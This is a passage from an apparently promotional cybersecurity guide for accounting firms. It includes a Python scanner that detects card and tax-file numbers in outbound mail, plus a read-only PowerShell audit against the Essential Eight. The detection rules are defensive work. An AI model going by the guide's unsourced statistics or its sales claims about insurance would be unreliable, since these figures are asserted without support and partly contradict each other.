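TFN_CANDIDATE = re.compile(r"(?<!\d)\d{3}[ -]?\d{3}[ -]?\d{3}(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn check: double every second digit from the right; the sum must be % 10 == 0."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def tfn_ok(digits: str) -> bool:
    """ATO TFN check: weighted sum with (1,4,3,7,5,8,6,9,10) must be divisible by 11."""
    weights = (1, 4, 3, 7, 5, 8, 6, 9, 10)
    return len(digits) == 9 and sum(int(d) * w for d, w in zip(digits, weights)) % 11 == 0


def scan_message(text: str) -> list:
    """Return (kind, masked value) for each protected number found."""
    findings = []
    for m in CARD_CANDIDATE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if luhn_ok(digits):
            findings.append(("card", digits[:6] + "*" * (len(digits) - 10) + digits[-4:]))
    for m in TFN_CANDIDATE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if tfn_ok(digits):
            findings.append(("tfn", "***" + digits[-3:]))
    return findings


def gateway_decision(text: str, recipient_domain: str,
                     internal_domain: str = "example.com.au"):
    """Block protected data leaving the organisation; internal mail passes but is logged."""
    findings = scan_message(text)
    if not findings:
        return "allow", findings
    if recipient_domain.lower() == internal_domain:
        return "log", findings
    return "block", findings


# Constructed sample messages: (body, recipient domain).
SAMPLE_MESSAGES = [
    ("Hi, please charge 4111 1111 1111 1111 exp 12/27 for the invoice.", "gmail.com"),
    ("Invoice ref 1234 5678 9012 3456 attached, thanks.", "client.example"),
    ("New starter TFN is 123 456 782, can you set up payroll?", "example.com.au"),
]

if __name__ == "__main__":
    for body, domain in SAMPLE_MESSAGES:
        print(gateway_decision(body, domain), "->", domain)
```

The check digits are what keep the rule usable: a sixteen-digit invoice reference that fails Luhn is allowed through, so staff are not trained to ignore the control by a flood of false positives. Findings are masked before they are logged, since the DLP log must not become a second copy of the data it exists to protect.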

Secure Remote Access Protocols: You and your employees should never connect remotely to your server or work PC through consumer remote-access tools such as GoToMyPC, LogMeIn or TeamViewer installed ad hoc, and Remote Desktop should never be exposed directly to the Internet; unmanaged remote access of this kind is one of the most common ways ransomware gets in. Remote access should be via a centrally managed, secure VPN (virtual private network) with multi-factor authentication, and only to the systems each person actually needs. For our clients who need this type of access, we will be implementing proper technologies that are secure.

Dark Web/Deep Web ID Monitoring: There are new tools available that monitor cybercrime websites and data for YOUR specific credentials being sold or traded. Once such breaches are detected, these tools notify you immediately so you can change your password and be on high alert.

On our own initiative, we have conducted a more thorough, CONFIDENTIAL investigation of your computer network, backups and security protocols as outlined in this report and have generated a custom “Risk Assessment Health Score.”

This score is based on a number of factors including, but not limited to, the type of data you have, regulatory compliance you may need to adhere to and other unique factors such as the number of employees you have, locations, nature of your business, etc.


Chapter 4: How to Create Your Cybersecurity Strategy 

To start with, you’ll need to consider the following points to ensure your business is properly protected. When it comes to cyber-attacks, it’s not a matter of if, but when.

  • You need to have support from everyone in the business from top to bottom to ensure your approach is employed.
  • Businesses with high cyber-resilience all consider support and oversight from management as the most important factor.
  • Cyber security is everyone’s business. All staff should know safe online practices.
  • Although you can find countless approaches promoting many useful actions, there is no single fix for cyber security.
  • Aiming to implement many actions, even if only to a small degree, is the best long-term approach to maximise protection with limited resources. Consider the full range of actions, rather than selecting a few.

An IT security framework is a set of guidelines, a kind of template, that can be applied to your business and its cyber security protocols to protect your security perimeter and minimise your risk of attack. The two most common frameworks in Australia are the Essential Eight (from the Australian Cyber Security Centre) and the framework from the National Institute of Standards and Technology (NIST), the US agency for industry standardisation and measurement.

CPA Australia has built its IT security framework around securing your information and system management, in order to protect clients’ sensitive information. This framework is based on the Essential Eight from the Australian Cyber Security Centre.
 
Most of the listed IT security frameworks focus on a risk-management approach, meaning these guidelines are easily adapted to match your needs, and applicable to your business to target the specific risks that threaten your IT Security. 

As the Australian Cyber Security Centre (ACSC) warns, business owners and managers must weigh investment in cybersecurity against other business needs and consider the overall level of cyber risk, the business’s exposure to such risks, and the potential whole-of-business cost that could be incurred if a serious cyber incident were to occur on the network.

A layered approach to security is required, and if we follow “The Essential Eight” from the Australian Signals Directorate we are moving in the right direction. However, even this is not enough, and they refer to “The Essential Eight” as a baseline.

According to the Australian Signals Directorate:
“While no single mitigation strategy is guaranteed to prevent cyber security incidents, organisations are recommended to implement eight essential mitigation strategies as a baseline. This baseline, known as the Essential Eight, makes it much harder for adversaries to compromise systems. Furthermore, implementing the Essential Eight proactively can be more cost-effective in terms of time, money and effort than having to respond to a successful large-scale cyber security incident”.

The ASD Essential Eight consists of:

  • Mitigation strategies to prevent malware delivery and execution
    • Application whitelisting of approved/trusted programs to prevent execution of unapproved/malicious programs including .exe, DLL, scripts (e.g. Windows Script Host, PowerShell and HTA) and installers.
    • Patch applications, e.g. Flash, web browsers, Microsoft Office, Java and PDF viewers. Patch/mitigate computers with ‘extreme risk’ vulnerabilities within 48 hours. Use the latest version of applications.
    • Configure Microsoft Office macro settings to block macros from the Internet, and only allow vetted macros either in ‘trusted locations’ with limited write access or digitally signed with a trusted certificate.
    • User application hardening. Configure web browsers to block Flash (ideally uninstall it), ads and Java on the Internet. Disable unneeded features in Microsoft Office (e.g. OLE), web browsers and PDF viewers.
  • Mitigation strategies to limit the extent of cyber security incidents
    • Restrict administrative privileges to operating systems and applications based on user duties. Regularly revalidate the need for privileges. Don’t use privileged accounts for reading email and web browsing.
    • Patch operating systems. Patch/mitigate computers (including network devices) with ‘extreme risk’ vulnerabilities within 48 hours. Use the latest operating system version. Don’t use unsupported versions.
    • Multi-factor authentication, including for VPNs, RDP, SSH and other remote access, and for all users when they perform a privileged action or access an important (sensitive/high availability) data repository.
  • Mitigation strategies to recover data and system availability
    • Daily backups of important new/changed data, software and configuration settings, stored disconnected, retained for at least three months. Test restoration initially, annually and when IT infrastructure changes.
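To make the baseline above concrete, here is an added example of a read-only PowerShell check that reports how a single Windows workstation measures up against several of the Essential Eight items just listed. It is not part of the original report and is not tooling from ASD or ACSC. It assumes Windows PowerShell 5.1 or later run locally with administrator rights, that Office macro policy lives under the Office 2016+ (16.0) HKCU policy keys, and that AppLocker is the whitelisting product in use; the 30-day “last hotfix” window is a rough patch-hygiene heuristic of my own, not the 48-hour rule for extreme-risk vulnerabilities. Multi-factor authentication and offline backups cannot be verified from the endpoint, so they are flagged for manual review rather than guessed at.

```powershell
<#
  Added example, not part of the original report and not ASD/ACSC tooling.
  Read-only audit of one Windows host against parts of the Essential Eight.
  Assumptions: Windows PowerShell 5.1+, local admin rights, Office 2016+ policy
  keys (16.0), AppLocker as the application whitelisting mechanism.
#>

function Get-RegistryValueOrNull {
    # Returns the named value, or $null when the key or value does not exist.
    param([string]$Path, [string]$Name)
    try   { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $null }
}

function New-Finding {
    param([string]$Control, [string]$Status, [string]$Detail)
    [pscustomobject]@{ Control = $Control; Status = $Status; Detail = $Detail }
}

$findings = @()

# Configure Microsoft Office macro settings: Internet-sourced macros blocked and
# VBAWarnings set to 3 (digitally signed only) or 4 (all macros disabled).
foreach ($app in 'Word', 'Excel', 'PowerPoint') {
    $policy = "HKCU:\Software\Policies\Microsoft\Office\16.0\$app\Security"
    $block  = Get-RegistryValueOrNull -Path $policy -Name 'blockcontentexecutionfrominternet'
    $warn   = Get-RegistryValueOrNull -Path $policy -Name 'VBAWarnings'
    $status = if (($block -eq 1) -and ($warn -in 3, 4)) { 'PASS' } else { 'FAIL' }
    $findings += New-Finding "Office macros ($app)" $status "blockcontentexecutionfrominternet=$block VBAWarnings=$warn (blank = not set by policy)"
}

# User application hardening: Windows Script Host disabled machine-wide (Enabled=0).
# A missing value means WSH is still enabled.
$wsh = Get-RegistryValueOrNull -Path 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled'
$findings += New-Finding 'Windows Script Host disabled' $(if ($wsh -eq 0) { 'PASS' } else { 'FAIL' }) "Enabled=$wsh"

# Application whitelisting: an effective AppLocker policy with at least one rule
# in an enforced (not audit-only) rule collection.
try {
    [xml]$applocker = Get-AppLockerPolicy -Effective -Xml -ErrorAction Stop
    $ruleCount     = $applocker.SelectNodes('//RuleCollection/*').Count
    $enforcedCount = $applocker.SelectNodes('//RuleCollection[@EnforcementMode="Enabled"]').Count
    $status = if ($ruleCount -gt 0 -and $enforcedCount -gt 0) { 'PASS' } else { 'FAIL' }
    $findings += New-Finding 'Application whitelisting (AppLocker)' $status "rules=$ruleCount enforcedCollections=$enforcedCount"
} catch {
    $findings += New-Finding 'Application whitelisting (AppLocker)' 'UNKNOWN' "Get-AppLockerPolicy failed: $($_.Exception.Message)"
}

# Restrict administrative privileges: list local Administrators so each member
# can be revalidated against the user's duties.
$admins = @(Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue)
$findings += New-Finding 'Local Administrators membership' 'REVIEW' (($admins | ForEach-Object { $_.Name }) -join ', ')

# Patch operating systems: days since the most recent hotfix was installed
# (heuristic; the 48-hour rule for extreme-risk patches needs vulnerability data).
$latest = Get-HotFix | Where-Object { $_.InstalledOn } | Sort-Object InstalledOn -Descending | Select-Object -First 1
$age    = if ($latest) { (New-TimeSpan -Start $latest.InstalledOn -End (Get-Date)).Days } else { $null }
$status = if ($null -ne $age -and $age -le 30) { 'PASS' } else { 'FAIL' }
$findings += New-Finding 'OS patch recency' $status "Last hotfix $($latest.HotFixID) installed $age days ago"

# Items that cannot be verified from the endpoint alone.
$findings += New-Finding 'Multi-factor authentication' 'MANUAL' 'Check VPN/RDP/SSH and privileged-action MFA at the identity provider'
$findings += New-Finding 'Daily disconnected backups' 'MANUAL' 'Confirm offline retention >= 3 months and a tested restore'

$findings | Format-Table -AutoSize
```

Run it as an administrator on a representative workstation; anything marked FAIL maps directly to an Essential Eight item above, and the REVIEW and MANUAL rows are the checks that need a human or a different system (the identity provider, the backup product) to close out.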

So, are you ready to protect your business properly from cyber threats? We will assist you with taking firm ownership of your data by implementing the highest protection measures available. Don’t fall victim to this ongoing threat when we have all the answers available here for you, ready to go.


Chapter 5: Implementation of Successful Cybersecurity Insurance

A cybersecurity threat can not only lead to the loss of your firm’s key data but financially drain your business as well. When your IT system is taken over by ransomware, basically your entire company is held hostage.
Even though cyber attacks went up by 700% last year, many accounting firms are still completely unprepared for an attack.

Therefore, a cyber insurance policy that covers you in the event of ransomware is a MUST HAVE for all firms. Read on to learn why your accounting business needs this type of technology insurance to protect it from a hack.

What is ransomware?
Ransomware is malicious software that infects a computer and displays messages demanding that a fee be paid. Before your IT system can work again, the ransom must be paid.
This malware is a moneymaking scheme that is installed through deceptive links. These could arrive in phishing emails, calendar invitations, instant messages, or on a website. Once these links are clicked, the malware can encrypt files or lock the entire computer screen.
The ransomware attack rate in Australia is far from the global average. In fact, 67% of Australian organisations experienced this issue in the last 12 months.

Protecting your firm
There are steps you can take to protect your firm from an attack, but without ransomware insurance, there is still a high risk. Along with getting the proper business insurance, you can do the following:
• Update software regularly
• Never open unsolicited emails
• Backup data regularly
• Restrict software privileges within the workplace
• Enable spam filters
• Use firewalls to block suspicious content
• Use strong passwords and multi-factor authentication
• Scan all emails for threats
With how much technology has advanced, you can get hacked even when you are being safe. Having the right insurance coverage is the only sure way to protect your business.

Cyber insurance
Cyber insurance can cover expenses and other financial losses due to a cyber event like malware attacks, cyber extortion, social engineering, or other invasive software.
A cyber policy typically covers three things, even though the policy may be broad. With a policy, you get covered for liability (regulatory defence and privacy lawsuits), internal financial loss (notification expenses, business interruption, extortion, data recovery, and crime/theft), and emergency incident response (covering costs that were lost due to a cyber event).

Typically, a main coverage cyber policy includes:
• Privacy breach notification & crisis management costs
• Privacy & security liability
• Business interruption – loss of profits & operational expenses
• Data recovery & system damage
• Regulatory defence and fines
• Media liability
• Social engineering & funds transfer fraud
• Payment card data security liability

Cybersecurity will continue to be a hot topic in all industries and all business sizes. The threat is ongoing and is not going away any time soon. The best way to ensure your firm is protected outside of installing the best technological protection is to also have the best insurance cover possible.

For more advice on how to protect your business from cybercrime, please call me for a chat.

Looking forward to hearing from you soon.

Iain Enticott - Technology for Accountants